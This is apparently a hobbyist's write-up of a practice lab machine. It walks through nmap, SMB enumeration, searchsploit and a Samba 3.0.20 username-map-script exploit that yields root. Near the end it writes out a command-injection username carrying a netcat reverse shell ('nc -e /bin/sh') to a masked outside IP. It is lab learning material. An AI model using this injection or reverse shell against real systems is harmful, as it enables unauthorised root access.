Normally I would've kept popping Windows boxes, but I wanted to see if I could get root flag with the newly found Copyfail exploit, which allows you to get root on shell access. This time around this ended up not happening haha.
Nmap time:
sudo nmap -sC -sV 10.129.30.106 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
That's a first - nothaving the HTTP port open, instead having SMB ports are open. FTP allows anonymous login, but the directory is completely empty. I tried smbmap to check whether I have anonymous access to any directories
smbmap -H 10.129.30.106
[+] IP: 10.129.30.106:445 Name: 10.129.30.106
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
We can access /tmp!
smbclient -N //10.129.30.106/tmp Anonymous login successful Try "help" to get a list of possible commands. smb: \> ls . D 0 Mon May 4 12:26:44 2026 .. DR 0 Sat Oct 31 01:33:58 2020 .ICE-unix DH 0 Mon May 4 11:46:23 2026 vmware-root DR 0 Mon May 4 11:46:59 2026 5655.jsvc_up R 0 Mon May 4 11:47:34 2026 .X11-unix DH 0 Mon May 4 11:46:49 2026 .X0-lock HR 11 Mon May 4 11:46:49 2026 vgauthsvclog.txt.0 R 1600 Mon May 4 11:46:21 2026
None of the subdirectories were of any use, as the permission to read through them was denied. This prompted me to backtrack a bit and use searchsploit to find any vulnerabilities for the two services running and ease the path to a shell:
searchsploit vsftpd
| linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb
searchsploit samba Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb
Username map script sounds interesting - we can pass commands through the username field by using backticks (` `) - running the normal command smbclient //10.129.30.106/tmp -U './=`nohup nc -e /bin/sh *.*.*.* 4567`' didn't want to work, so I used the Metasploit exploit of multi/samba/usermap_script instead. That nets us a root shell!